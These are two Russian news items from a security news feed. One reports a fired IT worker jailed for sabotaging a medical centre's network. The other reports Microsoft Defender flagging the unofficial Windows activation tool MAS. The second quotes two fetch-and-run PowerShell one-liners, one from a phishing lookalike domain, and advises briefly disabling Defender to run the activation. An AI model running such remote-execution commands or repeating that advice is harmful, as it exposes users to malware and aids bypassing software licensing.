Бывшая сотрудница медцентра отомстила за свое увольнение

Бывшая сотрудница медцентра отомстила за свое увольнение

На этой неделе состоялся суд по делу о взломе компьютерной сети медицинского центра, произошедшего в 2009 году. Злоумышленником оказалась бывшая сотрудница информационно-технического отдела центра; она была приговорена к 18 месяцам лишения свободы.

Согласно источнику, тридцатилетняя Патрисия Мари Фоулер, некогда работавшая в государственном медицинском центре Suncoast, расположенного в городе Раскин, штат Флорида, на должности технического специалиста информационно-технического отдела была уволена за несоблюдение субординации в марте 2009 года. Обиженная сотрудница не смогла с этим смириться и решила отомстить своему работодателю, вторгшись во внутреннюю сеть медцентра, в результате чего нанесла существенный ущерб, который оценивается в $17000. Стоит заметить, что центр является некоммерческим государственным учреждением, предоставляющим безвозмездное медицинское обслуживание.

В ходе таких «вторжений», коих было несколько с момента ее увольнения, она удалила и перенесла файлы с компьютеров руководства центра, изменила аутентификационные данные для администраторских учетных записей, заблокировала доступ к сетевым ресурсам и изменила информацию в платежной системе центра. Она даже додумалась изменить настройки сетевого экрана и заблокировать доступ к нему, чтобы администраторы не смогли их исправить. Последнее событие переполнило чашу терпения администрации, и они обратились в соответствующие органы.

Фоулер была арестована в апреле 2009 года. Отметим, что во время допроса, устроенного агентами ФБР, обвиняемая отказывалась от причастности к взлому, однако впоследствии признала свою вину и отдала пароли от файерволла.

Помимо основного наказания подсудимая будет обязана в течение трех лет после завершения срока заключения отчитываться о своей деятельности, а также она должна будет выплатить штраф в размере $17243.01.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru